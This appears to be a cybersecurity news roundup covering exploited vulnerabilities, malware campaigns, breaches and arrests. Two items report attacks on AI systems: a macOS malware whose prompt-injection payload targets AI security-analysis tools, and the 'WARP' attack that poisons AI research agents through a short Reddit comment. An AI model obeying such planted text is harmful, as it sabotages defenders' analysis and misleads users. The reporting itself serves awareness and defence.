Mandiant has shared new details about how hackers exploited a Cisco Catalyst SD-WAN vulnerability, tracked as CVE-2026-20245, in zero-day attacks. The high-severity flaw allowed attackers with access to affected devices to run commands as root by uploading a specially crafted file.
Another critical Cisco vulnerability (CVE-2026-20230) has also been reported as actively exploited. The flaw impacts Cisco Unified Communications Manager Server. Cisco issued security patches for the vulnerability on June 3, 2026, warning that successful exploitation could allow attackers to gain root-level privileges on affected systems.
The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that attackers are actively exploiting a vulnerability (CVE-2025-67038) in Lantronix EDS5000 devices that could allow the execution of arbitrary commands with elevated privileges. The updated KEV list also includes three vulnerabilities in Ubiquiti UniFi OS (CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910) that could enable unauthorized system changes, access to sensitive files, and remote code execution, potentially leading to full system compromise. Ubiquiti had released fixes for the flaws in May 2026.
Security company SOCRadar says that a large-scale FortiBleed campaign, which is targeting Fortinet FortiGate firewalls to steal authentication credentials from organizations worldwide, used custom sniffers to collect data. The campaign has been active since at least February 2026 and has targeted more than 430,000 FortiGate devices. Researchers believe the attackers act as an Initial Access Broker (IAB), gaining access to networks through credential stuffing, brute-force attacks, and password cracking.
Microsoft's threat intelligence team has detailed a sophisticated intrusion campaign linked to the ransomware group, tracked as Storm-2603, which targeted on-premises SharePoint servers throughout mid-2025. The attackers exploited known SharePoint vulnerabilities (CVE-2025-49706 and CVE-2025-49704) and conducted reconnaissance for additional access paths.
In a separate report, Microsoft has linked a recent supply chain attack targeting the Mastra AI ecosystem to the North Korean hacking group, tracked as Sapphire Sleet and BlueNoroff. Sapphire Sleet is a North Korean state-sponsored threat actor known for cryptocurrency theft, fake job scams, malicious browser extensions, and software supply chain attacks. Microsoft also linked the group to a separate npm supply chain attack targeting the Axios HTTP client in April 2026.
A previously undocumented malware botnet called AryStinger has infected more than 4,000 outdated routers worldwide. The malware turns compromised devices into remote-controlled systems that can be used for scanning networks, relaying malicious traffic, and carrying out attacks. AryStinger mainly targets older D-Link router models, including the DIR-850L and DIR-818LW, by exploiting known security flaws (CVE-2013-3307, CVE-2016-5681, and CVE-2025-11837).
A sophisticated malware known as ‘Showboat’ has been targeting telecom companies across the Middle East since 2022. Showboat collects system information, running processes, and screenshots from infected devices. Researchers believe that the malware is the work of China-affiliated threat actors.
SentinelLABS analyzed a Rust-based macOS malware implant called ‘macOS.Gaslight’ that includes a large prompt-injection payload designed to mislead AI-assisted security analysis tools and potentially cause them to stop or disrupt the analysis. The malware communicates with its operators through the Telegram Bot API using encrypted, certificate-pinned connections and hides its own Telegram bot token from logs and crash reports. Researchers assess with high confidence that macOS.Gaslight is linked to a broader cluster of DPRK-aligned macOS malware activity.
A threat actor is conducting a targeted malware campaign against Thailand’s healthcare sector, with attacks aimed at Ministry of Health officials, hospital administrators, clinic staff, and medical procurement teams. The campaign uses healthcare-themed spear-phishing emails that contain malicious RAR archives disguised as legitimate documents.
A Chrome extension called ‘Adblock for YouTube,’ which has over 10 million installs, has been found to contain a hidden capability that could allow it to run arbitrary JavaScript code on websites. The extension currently works as advertised by blocking YouTube ads, and researchers found no evidence of malicious activity. However, they warned that a server-side configuration change could potentially activate this code-execution feature without requiring an extension update or Chrome Web Store review.
A new malware campaign linked to an initial access broker associated with Payouts King ransomware is using a malicious Microsoft Edge browser extension, dubbed ‘Edgecution,’ to gain access to victim systems. The malware exploits the Chrome native messaging protocol, a feature supported by Chromium-based browsers that allows browser extensions to communicate with local applications. By abusing this interface, the attackers bypass browser sandbox restrictions and gain direct access to the host operating system.
A novel backdoor called ‘Mistic’ has been observed in financially motivated intrusions against organizations in sectors like insurance, education, IT, and professional services. Researchers believe it is connected to KongTuke/Woodgnat, a group that breaks into company networks and sells access to ransomware groups.
Netcraft warns that the Bluekit phishing-as-a-service platform is expanding, with nearly 70 new hostnames discovered in the past week. It now uses a browser-in-the-middle (BitM) technique, which lets attackers control a browser session that displays the real login page to victims. By using the rrweb JavaScript library, attackers can capture and stream user activity, making it easier to steal login credentials and other sensitive information.
Multiple enterprises have had their Salesforce accounts compromised in a hacking campaign linked to business intelligence platform Klue. The vendor said that attackers gained access to its systems on June 12 through a compromised legacy credential connected to an integration service.
The hackers then stole OAuth tokens used by customers to connect Klue with third-party platforms, including Salesforce. Using the stolen tokens, the attackers accessed customer Salesforce accounts and downloaded data. A new hacking group known as Icarus has claimed responsibility for the attack on its dark web leak site.
LastPass has also confirmed that hackers accessed customer data after stealing OAuth tokens during a cyberattack on Klue. LastPass said its products, services, infrastructure, and customer password vaults were not affected. The company also found no evidence that customer calls or emails stored in Gong were accessed. The exposed data may include customer names, phone numbers, email addresses, physical addresses, support case details, and sales-related information.
More than one-third of Samsung and LG smart TVs contain software that can turn the devices into proxy nodes. Researchers found the proxy code embedded within low-utility applications such as clock widgets, screensavers, games, and similar apps. Many of the applications rely on consent language buried in their terms of service, allowing them to claim user authorization for this functionality.
Researchers at Cornell Tech have discovered a new method for manipulating AI-powered deep-research systems, which doesn’t require access to search engine infrastructure or model internal components. The attack, called ‘Web Agent Retrieval Poisoning’ (WARP), targets AI research agents that gather information from the internet and create detailed reports. According to the researchers, a single Reddit comment containing as few as 13 carefully chosen words can influence what some AI systems include in their final reports.
An international law enforcement operation has disrupted the SocGholish malware network, linked to the Russia-based cybercrime group Evil Corp. Authorities seized over 100 servers and cleaned nearly 15,000 infected websites used to spread malware. The operation also shut down two malware strains called StealC and Amadey. Separately, Canada's intelligence agency was authorized to access and disconnect infected devices and servers from foreign-operated botnets, though it is unclear if this was connected to the SocGholish takedown.
Authorities have disrupted a major sports piracy network connected to PirloTV, targeting 44 domains that received over 950 million visits annually. PirloTV provided links to unauthorized live sports streams, mainly soccer matches, by embedding broadcasts from licensed networks. Although it did not host the streams itself, the platform was known for quickly moving to new domains whenever authorities shut down its websites.
Polish police, with support from the FBI and HSI, arrested four members of an organized crime group involved in cyberattacks, cryptocurrency theft, and large-scale money laundering. The suspects used hacking techniques and SIM-swapping attacks to gain access to victims' accounts and steal digital assets. The stolen funds, worth tens of millions of zlotys, were laundered through bank accounts, payment platforms, and digital wallets. All four suspects have been charged and placed in pre-trial detention, facing up to 25 years in prison.
A 21-year-old American, Nathan Austad (aka “Snoopy”), was sentenced to 18 months in prison for helping hack about 60,000 DraftKings accounts in a 2022 cyberattack. The attackers used stolen or reused passwords to access accounts, stealing around $600,000 from about 1,600 users. Austad admitted selling access to hacked accounts and was also ordered to pay over $1.3 million in restitution and nearly $464,000 in forfeiture. Other people involved in the scheme, including Joseph Garrison and Kamerin Stokes, have also received prison sentences.
The US Justice Department seized a cloud computing account used by subsidiaries of Cambodia-based Huione Group. Authorities allege the subsidiaries helped criminals move and launder money from cryptocurrency scams, cybercrime, and other illegal activities. The account supported Huione Guarantee (also known as Haowang Guarantee), which allegedly operated Telegram channels offering illicit services such as stolen data sales, money laundering assistance, and support for human trafficking schemes. Prosecutors say the platform helped criminals transfer large amounts of money stolen through scams run by Southeast Asian crime networks.
Two young men, Thalha Jubair and Owen Flowers, allegedly linked to the Scattered Spider cybercrime group have pleaded guilty to attacks connected to a major hack on Transport for London (TfL). The attack caused months of disruption and cost TfL about £39 million. Flowers also admitted trying to hack US healthcare organizations.
Abdellah Belmili, 26, an Algerian national, has been arrested and extradited to the United States to face federal charges related to operating the Market0Day platform. Belmili, aka “Dila Belmili” and “SPOX,” has been charged by criminal complaint with conspiracy to commit bank fraud, an offense carrying a maximum penalty of 30 years in prison. Market0Day sold illicit goods and services, including stolen banking credentials, compromised credit card information, malware tools, and victim login data.